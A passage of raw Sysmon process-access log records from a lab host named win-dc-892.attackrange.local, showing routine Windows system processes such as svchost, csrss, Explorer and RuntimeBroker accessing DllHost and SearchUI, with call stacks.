2|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000010765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.270{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.270{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.270{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.254{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.254{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.254{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-666E-6064-7001-00000000AE01}6024C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.254{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.254{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.254{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.254{266CAFBE-64C5-6064-A500-00000000AE01}43566452C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.239{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.239{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.239{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000010752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.239{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.239{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.239{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000010749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 